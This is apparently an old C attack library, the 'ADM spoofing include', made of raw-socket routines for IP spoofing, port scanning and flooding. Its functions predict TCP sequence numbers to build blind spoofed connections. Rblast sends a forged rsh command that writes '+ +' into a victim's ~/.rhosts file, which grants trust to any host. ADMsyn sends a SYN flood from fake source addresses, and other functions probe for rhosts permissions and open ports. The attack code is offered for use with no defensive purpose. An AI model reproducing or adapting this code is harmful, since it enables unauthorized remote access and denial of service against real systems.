/************************************************************************/ /* ADM spoofing include ver 1.4.11 */ /************************************************************************/ /************************************************************************/ /* The ADM Crew */ /************************************************************************/ /* all credits goings to my luv Heike & all ppl of Darknet */ /* ( for a fucking better world ) */ /************************************************************************/ /* bug/idea/etc > ADM@c5.hakker.com */ /************************************************************************/ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define IPHDRSIZE sizeof(struct iphdr ) #define ICMPHDRSIZE sizeof(struct icmphdr) #define TCPHDRSIZE sizeof(struct tcphdr ) #define PSEUDOHDRSIZE sizeof(struct pseudohdr) #define UDPHDRSIZE sizeof(struct udphdr) #define GGPHDRSIZE sizeof(struct ggphdr) #define ERROR -1 /*****************************************************************************/ /* structure of the pseudo header */ /*****************************************************************************/ struct ggphdr { u_char type; u_char un; u_short seq; }; struct pseudohdr { unsigned long saddr; unsigned long daddr; char useless; unsigned char protocol; unsigned short leng; }; struct nnn { u_long ip; } myip; struct s_hdr { __u32 s_ack:32; __u32 s_seq:32; __u32 s_da_ip:32; __u32 s_ip:32; __u16 s_sport:16; __u16 s_dport:16; } spoof_hdr; int TIMEOUTA = 3; int myrand () { int j; j = 1 + (int) (10000.0 * rand () / (RAND_MAX + 1.0)); return (j); } int myrand2 (int marge) { int j; j = 1 + (int) (marge * rand () / (RAND_MAX + 1.0)); return (j); } /*****************************************************************************/ /* * in_cksum -- * Checksum routine for Internet Protocol family headers (C Version) */ /*****************************************************************************/ unsigned short in_cksum (addr, len) u_short *addr; int len; { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; /* * Our algorithm is simple, using a 32 bit accumulator (sum), we add * sequential 16 bit words to it, and at the end, fold back all the * carry bits from the top 16 bits into the lower 16 bits. */ while (nleft > 1) { sum += *w++; nleft -= 2; } /* mop up an odd byte, if necessary */ if (nleft == 1) { *(u_char *) (&answer) = *(u_char *) w; sum += answer; } /* add back carry outs from top 16 bits to low 16 bits */ sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return (answer); } /****************************************************************************/ /* SEND A IP PACKET */ /****************************************************************************/ void send_ip (int s, u_long s_addr, u_long d_addr, u_char ttl, int proto, char *data, int size) { struct sockaddr_in sin; char packet[4096]; struct iphdr *ip; ip = (struct iphdr *) packet; bzero (packet, sizeof (packet)); ip->saddr = s_addr; ip->daddr = d_addr; ip->version = 4; ip->ihl = 5; ip->ttl = ttl; ip->id = random () % 5985; ip->protocol = proto; ip->tot_len = htons (IPHDRSIZE + size); ip->check = 0; ip->check = in_cksum ((char *) packet, IPHDRSIZE); sin.sin_family = AF_INET; sin.sin_addr.s_addr = d_addr; memcpy ((packet + IPHDRSIZE), data, size); if ((sendto (s, packet, IPHDRSIZE + size, 0, (struct sockaddr *) &sin, sizeof (struct sockaddr))) == ERROR) { perror ("sendto"); exit (ERROR); } } /****************************************************************************/ /* SEND A PAKET TCP ! */ /* usage: send_pkt(socket , ip of source , ip of dest , source port, dest port, flags, seq_num, ack_num, window size , *data , size of data); */ /****************************************************************************/ void send_pkt (s, s_ip, d_ip, s_port, d_port, flags, seq_num, ack_num, winsize, data, data_size) int s; unsigned long s_ip; unsigned long d_ip; unsigned short s_port; unsigned short d_port; unsigned char flags; unsigned long seq_num; unsigned long ack_num; unsigned short winsize; unsigned char *data; unsigned short data_size; { struct sockaddr_in sin_dst; struct iphdr *ip; struct tcphdr *tcp; struct pseudohdr *pseudo; unsigned char *DATA; unsigned char packet[2048]; ip = (struct iphdr *) packet; pseudo = (struct pseudohdr *) (packet + IPHDRSIZE - PSEUDOHDRSIZE); tcp = (struct tcphdr *) (packet + IPHDRSIZE); DATA = (unsigned char *) (packet + IPHDRSIZE + TCPHDRSIZE); bzero (packet, sizeof (packet)); memcpy (DATA, data, data_size); pseudo->saddr = s_ip; pseudo->daddr = d_ip; pseudo->useless = 0; pseudo->protocol = 6; pseudo->leng = htons (TCPHDRSIZE + data_size); tcp->th_sport = htons (s_port); tcp->th_seq = htonl (seq_num); tcp->th_ack = htonl (ack_num); tcp->th_off = 5; tcp->th_flags = flags; tcp->th_win = htons (winsize); tcp->th_urp = 0; tcp->th_dport = htons (d_port); tcp->th_sum = 0; tcp->th_sum = in_cksum (pseudo, TCPHDRSIZE + PSEUDOHDRSIZE + data_size); bzero (packet, IPHDRSIZE); ip->saddr = s_ip; ip->daddr = d_ip; ip->version = 4; ip->ihl = 5; ip->ttl = 245; ip->protocol = 6; ip->tot_len = htons (IPHDRSIZE + TCPHDRSIZE + data_size); ip->tos = 0; ip->id = random () % 1256; ip->frag_off = 0; ip->check = 0; ip->check = in_cksum (packet, IPHDRSIZE); sin_dst.sin_addr.s_addr = ip->daddr; sin_dst.sin_family = AF_INET; if ((sendto (s, packet, IPHDRSIZE + TCPHDRSIZE + data_size, 0, (struct sockaddr *) &sin_dst, sizeof (struct sockaddr))) == ERROR) { perror ("sendto"); exit (ERROR); } } /*****************************************************************************/ /* SEND A UDP PACKET */ /* usage: udp_send( socket, addr of source , addr of dest, port source , */ /* port of dest, *data , size of data); */ /*****************************************************************************/ void udp_send (s, s_addr, d_addr, s_port, d_port, datagram, datasize) int s; unsigned long s_addr; unsigned long d_addr; unsigned short s_port; unsigned short d_port; char *datagram; unsigned short datasize; { struct sockaddr_in sin; struct iphdr *ip; struct udphdr *udp; unsigned char *data; unsigned char packet[1024]; ip = (struct iphdr *) packet; udp = (struct udphdr *) (packet + IPHDRSIZE); data = (unsigned char *) (packet + IPHDRSIZE + UDPHDRSIZE); bzero (packet, sizeof (packet)); udp->source = htons (s_port); udp->dest = htons (d_port); udp->len = htons (UDPHDRSIZE + datasize); udp->check = 0; memcpy (data, datagram, datasize); bzero (packet, IPHDRSIZE); ip->saddr = s_addr; ip->daddr = d_addr; ip->version = 4; ip->ihl = 5; ip->ttl = 245; ip->id = random () % 5985; ip->protocol = 17; ip->tot_len = htons (IPHDRSIZE + UDPHDRSIZE + datasize); ip->check = 0; ip->check = in_cksum ((char *) packet, IPHDRSIZE); sin.sin_family = AF_INET; sin.sin_addr.s_addr = d_addr; sin.sin_port = udp->dest; if ((sendto (s, packet, IPHDRSIZE + UDPHDRSIZE + datasize, 0, (struct sockaddr *) &sin, sizeof (struct sockaddr))) == ERROR) { perror ("sendto"); exit (ERROR); } } /****************************************************************************/ /* SEND A ICMP PACKET */ /* hehe ripped from ADMscan2 :) */ /****************************************************************************/ /* IN TEST !!!!!!! int icmp_echo(int s,unsigned long int src, unsigned long int dest,int id,int seq, char* data, unsigned short datasize) { struct iphdr *ip; struct icmphdr *icmp; unsigned char *icmpdata; unsigned char *packet; struct sockaddr_in sin_dst; int n; packet = (char*)malloc(IPHDRSIZE +ICMPHDRSIZE+datasize+1); if (packet == NULL) { puts("malloc error"); return -1; } ip = (struct iphdr *)packet; icmp = (struct icmphdr *)(packet+IPHDRSIZE); icmpdata = (char *)(packet+IPHDRSIZE+ICMPHDRSIZE); ip->saddr = src; ip->daddr = dest; ip->version = 4; ip->ihl = 5; ip->ttl = 255; ip->protocol = 1; ip->tot_len = htons(IPHDRSIZE +ICMPHDRSIZE+datasize); ip->tos = 0; ip->id = 0; ip->frag_off = 0; ip->check = 0; ip->check = in_cksum(ip,IPHDRSIZE); icmp->type = 8; icmp->code = 0; icmp->checksum = 0; icmp->un.echo.id = id; icmp->un.echo.sequence = seq; memcpy(icmpdata,data,datasize); icmp->checksum = in_cksum(icmp,ICMPHDRSIZE+datasize); sin_dst.sin_addr.s_addr = ip->daddr; sin_dst.sin_family = AF_INET; n=sendto(s,packet,IPHDRSIZE+ICMPHDRSIZE+datasize,0, (struct sockaddr*)&sin_dst,sizeof(struct sockaddr)); if (n==-1) puts("sendto error"); free(packet); } */ /***************************************************************************/ /* LAGOMETER */ /***************************************************************************/ int lagometer (unsigned long int src, unsigned long int dest, int MaxTime, int MaxTry) { struct iphdr *ip, *ipr; struct icmphdr *icmp, *icmpr; unsigned char *icmpdata; unsigned char *packet; unsigned char rcpt[512]; struct sockaddr_in sin_dst; int datasize = 200; int id = 0xc0ca; int seq = 0xdead; int n; int s, s_r; int tim = 0; int try = 0; int maxwait = 0; if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == ERROR) { perror ("socket"); exit (ERROR); } if ((s_r = socket (AF_INET, SOCK_RAW, IPPROTO_ICMP)) == ERROR) { perror ("socket"); exit (ERROR); } if ((fcntl (s_r, F_SETFL, O_NONBLOCK)) == ERROR) { perror ("fcntl"); exit (ERROR); } packet = (char *) malloc (IPHDRSIZE + ICMPHDRSIZE + datasize + 1); if (packet == NULL) { puts ("malloc error"); return -1; } while (1) { ipr = (struct iphdr *) rcpt; icmpr = (struct icmphdr *) (rcpt + IPHDRSIZE); ip = (struct iphdr *) packet; icmp = (struct icmphdr *) (packet + IPHDRSIZE); icmpdata = (char *) (packet + IPHDRSIZE + ICMPHDRSIZE); bzero (packet, (IPHDRSIZE + ICMPHDRSIZE + datasize + 1)); bzero (rcpt, sizeof (rcpt)); ip->saddr = src; ip->daddr = dest; ip->version = 4; ip->ihl = 5; ip->ttl = 255; ip->protocol = 1; ip->tot_len = htons (IPHDRSIZE + ICMPHDRSIZE + datasize); ip->tos = 0; ip->id = 0; ip->frag_off = 0; ip->check = 0; ip->check = in_cksum (ip, IPHDRSIZE); icmp->type = 8; icmp->code = 0; icmp->checksum = 0; icmp->un.echo.id = id; icmp->un.echo.sequence = seq; memcpy (icmpdata, rcpt, datasize); icmp->checksum = in_cksum (icmp, ICMPHDRSIZE + datasize); sin_dst.sin_addr.s_addr = ip->daddr; sin_dst.sin_family = AF_INET; n = sendto (s, packet, IPHDRSIZE + ICMPHDRSIZE + datasize, 0, (struct sockaddr *) &sin_dst, sizeof (struct sockaddr)); if (n == -1) puts ("sendto error"); if (try < MaxTry) for (maxwait = 1; maxwait < MaxTime; maxwait++) { sleep (1); if (read (s_r, rcpt, sizeof (rcpt)) == -1) continue; else { if (ipr->saddr == dest) if (ipr->daddr == src) if (ipr->protocol == 1) if (icmpr->un.echo.id == id) { close (s); close (s_r); return (maxwait); } } } try++; if (try == MaxTry || try > MaxTry) { close (s); close (s_r); return (ERROR); } } } /****************************************************************************/ /* SEND A GGP ECHO packet */ /****************************************************************************/ void ggp_send (s, s_addr, d_addr) int s; unsigned long s_addr; unsigned long d_addr; { struct sockaddr_in sin; char packet[1024]; struct iphdr *ip; struct ggphdr *ggp; bzero (packet, sizeof (packet)); ip = (struct iphdr *) packet; ggp = (struct ggphdr *) (packet + IPHDRSIZE); bzero (packet, sizeof (packet)); ggp->type = 8; bzero (packet, IPHDRSIZE); ip->saddr = s_addr; ip->daddr = d_addr; ip->version = 4; ip->ihl = 5; ip->ttl = 245; ip->id = random () % 5985; ip->protocol = 3; ip->tot_len = htons (IPHDRSIZE + GGPHDRSIZE); ip->check = 0; ip->check = in_cksum ((char *) packet, IPHDRSIZE); sin.sin_family = AF_INET; sin.sin_addr.s_addr = d_addr; if ((sendto (s, packet, IPHDRSIZE + GGPHDRSIZE, 0, (struct sockaddr *) &sin, sizeof (struct sockaddr))) == ERROR) { perror ("sendto"); exit (ERROR); } } /****************************************************************************/ /* TEST IF A HOST IS ALIVE */ /* */ /****************************************************************************/ /*****************************************************************************/ /* RECV PAKET */ /* get_pkt(socket, *buffer , size of the buffer); */ /*****************************************************************************/ int get_pkt (s, data, size) int s; unsigned char *data; int size; { struct sockaddr_in sin; int len, resu; len = sizeof (sin); resu = recvfrom (s, data, size, 0, (struct sockaddr *) &sin, &len); return resu; } /*****************************************************************************/ /* GET THE SEQ NUMBER */ /*****************************************************************************/ unsigned long get_seq (s_ip, d_ip, s_port) unsigned long s_ip; unsigned long d_ip; unsigned short s_port; { struct tcphdr *tcp; struct iphdr *ip; unsigned char data[400]; int i = 1; int timeout = 0; int s, s_r, S_port; unsigned long ack_num = 0; ip = (struct iphdr *) data; tcp = (struct tcphdr *) (data + IPHDRSIZE); bzero (data, sizeof (data)); S_port = random () % 1000; if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == ERROR) { perror ("socket"); exit (ERROR); } if ((s_r = socket (AF_INET, SOCK_RAW, IPPROTO_TCP)) == ERROR) { perror ("socket"); exit (ERROR); } if ((fcntl (s_r, F_SETFL, O_NONBLOCK)) == ERROR) { perror ("fcntl"); exit (ERROR); } if ((fcntl (s, F_SETFL, O_NONBLOCK)) == ERROR) { perror ("fcntl"); exit (ERROR); } if ((setsockopt (s, IPPROTO_IP, IP_HDRINCL, (char *) &i, sizeof (i))) == ERROR) { perror ("ioctl"); exit (ERROR); } send_pkt (s, s_ip, d_ip, S_port, s_port, TH_SYN, 1234, 0, 512, NULL, 0); while (timeout < 480) { get_pkt (s_r, data, sizeof (data)); if (ip->saddr == d_ip) if (tcp->th_dport == htons (S_port)) if (tcp->th_sport == htons (s_port)) if (tcp->th_flags & TH_ACK) { printf (" SeQ numa Is %lu \n", ntohl (tcp->th_seq)); ack_num = ntohl (tcp->th_seq); break; } usleep (10000); timeout++; } close (s); close (s_r); return (ack_num); } /*****************************************************************************/ /* PORT PROBER */ /* usage: pprobe(ip of desti , port ,flagz ) */ /*****************************************************************************/ int pprobe (da_ip, port, flagz) unsigned long da_ip; unsigned short port; int flagz; { struct tcphdr *tcp; struct iphdr *ip, *ipr; unsigned char data[400]; unsigned char datar[400]; int s, i = 1, s_r, resu = -1, timeout = 0, sicmp; ip = (struct iphdr *) data; tcp = (struct tcphdr *) (data + IPHDRSIZE); ipr = (struct iphdr *) data; bzero (data, sizeof (data)); if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == ERROR) { perror ("socket"); exit (ERROR); } if ((s_r = socket (AF_INET, SOCK_RAW, IPPROTO_TCP)) == ERROR) { perror ("socket"); exit (ERROR); } if ((sicmp = socket (AF_INET, SOCK_RAW, IPPROTO_ICMP)) == ERROR) { perror ("socket"); exit (ERROR); } if ((fcntl (s_r, F_SETFL, O_NONBLOCK)) == ERROR) { perror ("fcntl"); exit (ERROR); } if ((fcntl (sicmp, F_SETFL, O_NONBLOCK)) == ERROR) { perror ("fcntl"); exit (ERROR); } if ((setsockopt (s, IPPROTO_IP, IP_HDRINCL, (char *) &i, sizeof (i))) == ERROR) { perror ("setsockopt"); exit (ERROR); } send_pkt (s, myip.ip, da_ip, 2669, port, flagz, 1234, 0, 512, NULL, 0); while (timeout < 80) { data[0] = '0'; datar[0] = '0'; usleep (100000); timeout = timeout + 1; get_pkt (s_r, data, 399); get_pkt (sicmp, datar, 399); if (datar[0] != '0') { resu = -1; printf ("ICMP!\n"); return (resu); } if (data[0] != '0') if (ip->saddr == da_ip) if (tcp->th_dport == htons (2669)) if (tcp->th_sport == htons (port)) { resu = (tcp->th_flags | TH_ACK); if (resu == 18) resu = 0; if (resu == 20) resu = -1; break; } } /* end of the while loop */ if (timeout > 79) printf (" Time Out"); close (s); close (s_r); close (sicmp); return (resu); } /****************************************************************************/ /* pprobeS ( ip victim, flagz,FILE filez, port limit) */ /****************************************************************************/ int pprobeS (unsigned long da_ip, int flagz, FILE * filez, u_int limit) { struct tcphdr *tcp; struct iphdr *ip, *ipr; unsigned char data[400]; int s, i = 1, s_r, resu = -1; u_long lim; bzero (data, sizeof (data)); ip = (struct iphdr *) data; tcp = (struct tcphdr *) (data + IPHDRSIZE); ipr = (struct iphdr *) data; if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == ERROR) { perror ("socket"); exit (ERROR); } if ((s_r = socket (AF_INET, SOCK_RAW, IPPROTO_TCP)) == ERROR) { perror ("socket"); exit (ERROR); } if ((setsockopt (s, IPPROTO_IP, IP_HDRINCL, (char *) &i, sizeof (i))) == ERROR) { perror ("setsockopt"); exit (ERROR); } while (lim < limit) { send_pkt (s, myip.ip, da_ip, 2669, lim, flagz, 1234, 0, 512, NULL, 0); data[0] = '0'; get_pkt (s_r, data, sizeof (data)); if (data[0] != '0') if (ip->saddr == da_ip) if (tcp->th_dport == htons (2669)) if (tcp->th_sport != htons (2669)) { resu = (tcp->th_flags | TH_ACK); if (resu == 18) { printf ("port %i open !\n", ntohs (tcp->th_sport)); fprintf (filez, "%i\n", ntohs (tcp->th_sport)); fflush (filez); goto fin; } } fin: lim++; } /* end of while loop */ close (s); close (s_r); return resu; } /****************************************************************************/ /* UDP PORT PROBBER */ /* usage: Upprobe( ip of dest , port) */ /****************************************************************************/ int Upprobe (unsigned long da_ip, unsigned short int port) { struct sockaddr_in sin_dst; struct icmphdr *icmp; struct iphdr *ip; unsigned char data[400]; int s, i = 1, s_r, resu, time = 0; ip = (struct iphdr *) data; icmp = (struct icmphdr *) (data + IPHDRSIZE); bzero (data, sizeof (data)); /* SOCK_DGRAM INIT */ if ((s = socket (AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == ERROR) { perror ("socket"); exit (ERROR); } if ((fcntl (s, F_SETFL, O_NONBLOCK)) == ERROR) { perror ("fcntl"); exit (ERROR); } sin_dst.sin_family = AF_INET; sin_dst.sin_port = htons (port); sin_dst.sin_addr.s_addr = da_ip; sendto (s, NULL, 0, 0, (struct sockaddr *) &sin_dst, sizeof (sin_dst)); /* SOCK_RAW FOR LISTEN ICMP */ if ((s_r = socket (AF_INET, SOCK_RAW, IPPROTO_ICMP)) == ERROR) { perror ("socket"); exit (ERROR); } if ((fcntl (s_r, F_SETFL, O_NONBLOCK)) == ERROR) { perror ("fcntl"); exit (ERROR); } resu = -1; while (time < 200) { data[0] = '0'; get_pkt (s_r, data, sizeof (data)); if (data[0] != '0') if (ip->saddr == da_ip) if (ip->protocol == 1) return (-1); else time++; } return (0); } /****************************************************************************/ /* MakE A sPOoF ConnEction */ /* */ /* usage(socket,sourceIP,Destination IP ,port SOurce, port Dest,ipofurhost) */ /****************************************************************************/ int Sconnect (int s, unsigned long s_ip, unsigned long d_ip, unsigned short int s_port, unsigned short int d_port, unsigned long myhost) { int loop; spoof_hdr.s_seq = 1; spoof_hdr.s_da_ip = d_ip; spoof_hdr.s_ip = s_ip; spoof_hdr.s_sport = s_port; spoof_hdr.s_dport = d_port; spoof_hdr.s_ack = get_seq (myhost, d_ip, d_port); if (spoof_hdr.s_ack == 0) { printf (" Too SLoww \n"); return (ERROR); } send_pkt (s, s_ip, d_ip, s_port, d_port, TH_SYN, spoof_hdr.s_seq, 1, 512, NULL, 0); for (loop = 1; loop < 8; loop++) { spoof_hdr.s_seq = spoof_hdr.s_seq; printf (" spoof ack +64000*%i+1 =%u \n", loop, spoof_hdr.s_ack + (64000 * loop) + 1); send_pkt (s, s_ip, d_ip, s_port, d_port, TH_ACK, spoof_hdr.s_seq + 1, spoof_hdr.s_ack + (64000 * loop) + 1, 14360, NULL, 0); } spoof_hdr.s_seq = spoof_hdr.s_seq + 1; return (0); } /*****************************************************************************/ /* Spoofed Write ( need Sconnect before ) */ /* usage: Swrite (socket, *data , sizeofdata ); */ /*****************************************************************************/ void Swrite (int s, u_char * data, int size) { int loop; for (loop = 1; loop < 8; loop++) { send_pkt (s, spoof_hdr.s_ip, spoof_hdr.s_da_ip, spoof_hdr.s_sport, spoof_hdr.s_dport, (TH_PUSH | TH_ACK), spoof_hdr.s_seq, spoof_hdr.s_ack + (64000 * loop) + 1, 14360, data, size); } spoof_hdr.s_seq = spoof_hdr.s_seq + size; } /****************************************************************************/ /* Spoofed write 2 */ /* usage: Swrites(s,*data); */ /****************************************************************************/ void Swrites (int s, char *data) { int size; size = strlen (data); Swrite (s, data, size); } /****************************************************************************/ /* RESET CONNEXION */ /****************************************************************************/ void Srst (int s) { int loop; for (loop = 1; loop < 8; loop++) { send_pkt (s, spoof_hdr.s_ip, spoof_hdr.s_da_ip, spoof_hdr.s_sport, spoof_hdr.s_dport, TH_FIN, spoof_hdr.s_seq, spoof_hdr.s_ack + (64000 * loop) + 1, 14360, NULL, 0); } for (loop = 1; loop < 8; loop++) { send_pkt (s, spoof_hdr.s_ip, spoof_hdr.s_da_ip, spoof_hdr.s_sport, spoof_hdr.s_dport, TH_ACK, spoof_hdr.s_seq, spoof_hdr.s_ack + (64000 * loop) + 1, 14360, NULL, 0); } } /*****************************************************************************/ /* Test If a Host Is SPoofable */ /* usage: Stest (myhost,ip dest , port of dest); */ /*****************************************************************************/ int Stest (unsigned long myhost, unsigned long ip_d, unsigned short d_port) { u_long resu; u_long resu1; u_long resu2; u_long resu3; int done = -1; resu = get_seq (myhost, ip_d, d_port); resu1 = get_seq (myhost, ip_d, d_port); resu2 = get_seq (myhost, ip_d, d_port); resu3 = get_seq (myhost, ip_d, d_port); if (resu1 - resu == 64000 || resu1 - resu == 128000) done = 0; if (resu3 - resu2 == 64000 || resu3 - resu2 == 128000) done = 0; return (done); } /****************************************************************************/ /* get only the IP frome a host -l ouput filez */ /* usage: IPFILEZ( *the src filez, *the output filez); */ /****************************************************************************/ void IPFILEZ (FILE * DA, FILE * trace) { char ipz[256]; int oki; while (!feof (DA)) { int size; fscanf (DA, "%s", ipz); size = strspn (ipz, "aAeEiIoOuUyYgG"); if (size <= 0) oki = 1; if (oki == 1) { fprintf (trace, "%s\n", ipz); fflush (trace); oki = 0; } if (feof (DA)) break; } } /****************************************************************************/ /* make a Scan Port on a plage of port */ /* Scan2( *int input,int*output,size of *); */ /****************************************************************************/ void Scan2 (int *ptr, int *outptr, int Size, int flagz, u_long da_ip) { struct tcphdr *tcpr; struct iphdr *ipr; unsigned char datar[400]; int s, i = 1, s_r, resu, timeout = 0, try = 0, on = 1, con; time_t timez; ipr = (struct iphdr *) datar; tcpr = (struct tcphdr *) (datar + IPHDRSIZE); bzero (outptr, (Size * sizeof (outptr))); bzero (datar, sizeof (datar)); /* socket stuff */ if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == ERROR) { perror ("socket"); exit (ERROR); } if ((s_r = socket (AF_INET, SOCK_RAW, IPPROTO_TCP)) == ERROR) { perror ("socket"); exit (ERROR); } if ((fcntl (s_r, F_SETFL, O_NONBLOCK)) == ERROR) { perror ("fcntl"); exit (ERROR); } if ((setsockopt (s, IPPROTO_IP, IP_HDRINCL, (char *) &i, sizeof (i))) == ERROR) { perror ("setsockopt"); exit (ERROR); } con = myrand (); timez = time (NULL); while (((time (NULL) - TIMEOUTA) < timez)) { datar[0] = '0'; usleep (10000); timeout++; if (try < Size) if (*(ptr + try) != 0) send_pkt (s, myip.ip, da_ip, (40000 + con) - try, *(ptr + try), flagz, 1234, 0, 512, NULL, 0); if (get_pkt (s_r, datar, sizeof (datar)) != -1) if (ipr->saddr == da_ip) if (ntohs (tcpr->th_dport) > 39000) { resu = (tcpr->th_flags | TH_ACK); if (resu == 18) { *(outptr + ((40000 + con) - ntohs (tcpr->th_dport))) = ntohs (tcpr->th_sport); printf ("The Port %i is open :)\n", ntohs (tcpr->th_sport)); resu = 0; } } try++; } /* end of while loop */ close (s); close (s_r); } /****************************************************************************/ /* Rtest a function for test the permission of R service */ /* Rtest(ip of victim,port); */ /****************************************************************************/ int Rtest (u_long ip, int port, char *Ruser, char *Luser) { struct sockaddr_in adresse_serveur, adresse_client; char bla[2000]; char cmd[200]; char exe[200] = "ls -al ~/.rhosts"; char *cmdptr; int socket_client, err = 0, i; int longueur = sizeof (struct sockaddr_in); bzero (bla, sizeof (bla)); bzero (cmd, sizeof (cmd)); cmdptr = cmd; if (port == 514) { if ((socket_client = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)) == ERROR) { perror ("socket"); exit (ERROR); } adresse_client.sin_family = AF_INET; adresse_client.sin_addr.s_addr = htonl (INADDR_ANY); adresse_client.sin_port = htons (666); while (1) { if ((bind (socket_client, (struct sockaddr *) &adresse_client, longueur)) == -1) { i = ntohs (adresse_client.sin_port); i++; adresse_client.sin_port = htons (i); } else break; } adresse_serveur.sin_family = AF_INET; adresse_serveur.sin_port = htons (514); adresse_serveur.sin_addr.s_addr = ip; connect (socket_client, (struct sockaddr *) &adresse_serveur, longueur); send (socket_client, "0\0", 2, 0); strcat (cmd, Luser); send (socket_client, cmd, strlen (Luser) + 1, 0); bzero (cmd, sizeof (cmd)); cmdptr = cmd; strcat (cmdptr, Ruser); cmdptr = cmdptr + strlen (Ruser) + 1; strcat (cmdptr, exe); send (socket_client, cmd, strlen (Ruser) + strlen (exe) + 2, 0); printf ("we trying to execute a - ls -al ~/.rhosts - on %s\n", inet_ntoa (ip)); bzero (bla, sizeof (bla)); read (socket_client, bla, sizeof (bla)); printf ("%s\n", bla); if (strstr (bla, "nied") || strstr (bla, "inc")) { close (socket_client); err = -1; } else { read (socket_client, bla, sizeof (bla)); if (strstr (".rhosts", bla)) err = 1; else err = -1; printf ("%s\n", bla); } close (socket_client); } return (err); } /****************************************************************************/ /* Rblast a function for try the RSH spoofing */ /* Rblast(ip trust,ip of victim,ur ip,sport ,local user, remote user ) */ /* ya u cant determine ur own comand for this use ADMrsh ! */ /****************************************************************************/ void Rblast (u_long s_ip, u_long d_ip, u_long my_ip, int port, char *Luser, char *Ruser) { char bla[] = "echo \"+ +\" >> ~/.rhosts"; char cmd[512]; int s, s_r; int i = 1; char *cmdptr; if ((s_r = socket (AF_INET, SOCK_RAW, IPPROTO_TCP)) == ERROR) { perror ("socket"); exit (ERROR); } if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == ERROR) { perror ("socket"); exit (ERROR); } if ((setsockopt (s, IPPROTO_IP, IP_HDRINCL, (char *) &i, sizeof (i))) == ERROR) { perror ("setsockopt"); exit (ERROR); } cmdptr = cmd; strcat (cmdptr, "0\0"); cmdptr = cmdptr + 2; strcat (cmdptr, Luser); cmdptr = cmdptr + strlen (Luser) + 1; strcat (cmdptr, Ruser); cmdptr = cmdptr + strlen (Ruser) + 1; strcat (cmdptr, bla); cmdptr = cmdptr + strlen (bla) + 1; printf ("make spoof connection ...\n"); printf ("%s@%s --> ", Luser, inet_ntoa (s_ip)); printf ("%s@%s\n", Ruser, inet_ntoa (d_ip)); Sconnect (s, s_ip, d_ip, port, 514, my_ip); printf ("send the spoof rsh... \n"); Swrite (s, cmd, strlen (Luser) + strlen (Ruser) + strlen (bla) + 2 + 3); Srst (s); close (s); } /*****************************************************************************/ /* ADMsyn( ip dest , port , numba of packet */ /*****************************************************************************/ void ADMsyn (u_long d_ip, u_int port, int num) { int i = 1, s; u_int s_ip; if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == ERROR) { perror ("socket"); exit (ERROR); } if ((setsockopt (s, IPPROTO_IP, IP_HDRINCL, (char *) &i, sizeof (i))) == ERROR) { perror ("setsockopt"); exit (ERROR); } s_ip = 0x01010101; for (i = 0; i < num; i++) { s_ip = ntohl (s_ip); s_ip++; s_ip = htonl (s_ip); send_pkt (s, s_ip, d_ip, 514 + i, port, TH_SYN, 123, 3, 512, NULL, 0); } } /*********************************************************************/ /* ADM tcp sampler IN TEST !!! */ /*********************************************************************/ ADMsmptcp (u_long s_ip, u_long d_ip, u_int port, u_int num ) { struct tcphdr *tcp; struct iphdr *ip; unsigned char data[400]; int s, i = 1, a = 0, s_r, S_port; int time, timeout = 480; int TRY = 0; u_int SEQ = 0; ip = (struct iphdr *) data; tcp = (struct tcphdr *) (data + IPHDRSIZE); bzero (data, sizeof (data)); S_port = random () % 1000; if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == ERROR) { perror ("socket"); exit (ERROR); } if ((s_r = socket (AF_INET, SOCK_RAW, IPPROTO_TCP)) == ERROR) { perror ("socket"); exit (ERROR); } if ((fcntl (s_r, F_SETFL, O_NONBLOCK)) == ERROR) { perror ("fcntl"); exit (ERROR); } if ((setsockopt (s, IPPROTO_IP, IP_HDRINCL, (char *) &i, sizeof (i))) == ERROR) { perror ("setsockopt"); exit (ERROR); } i = 0; while (i < num) { send_pkt (s, s_ip, d_ip, S_port, port, TH_SYN, 123, 3, 512, NULL, 0); bzero (data, sizeof (data)); while (1) { if ((get_pkt (s_r, data, sizeof (data))) == -1) { usleep (10000); time++; if (time > timeout) return (ERROR); } else { if (ip->saddr == d_ip) if (tcp->th_dport == htons (S_port)) if (tcp->th_sport == htons (port)) if ((tcp->th_flags & TH_ACK) && (tcp->th_flags & TH_SYN)) { printf ("seq recue %lu diff %lu\n", ntohl (tcp->th_seq), ntohl (tcp->th_seq) - SEQ); SEQ = ntohl (tcp->th_seq); i++; break; } } } /* end of while */ } /* end of while */ }